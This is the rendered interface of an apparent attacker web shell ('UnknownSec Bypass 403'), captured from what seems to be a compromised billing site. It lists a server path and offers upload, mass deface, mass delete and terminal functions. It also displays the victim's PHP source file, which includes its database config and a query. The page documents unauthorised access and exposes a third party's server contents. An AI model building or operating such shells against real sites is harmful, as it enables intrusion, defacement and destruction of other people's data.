UnknownSec Bypass
403
:
/
var
/
www
/
stbilling
/
cpanel
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
get_total_product.php
<?php require_once("../config.php"); $query =mysqli_query($conn,"SELECT * FROM master where identifier=3 and modificationdatetime is null and isdeleted=0"); while($row=mysqli_fetch_array($query)) { $result[] = array( 'mascode' => $row['masterid'], 'masname' => $row['name'], ); } echo json_encode($result); ?>
Copyright © 2025 - UnknownSec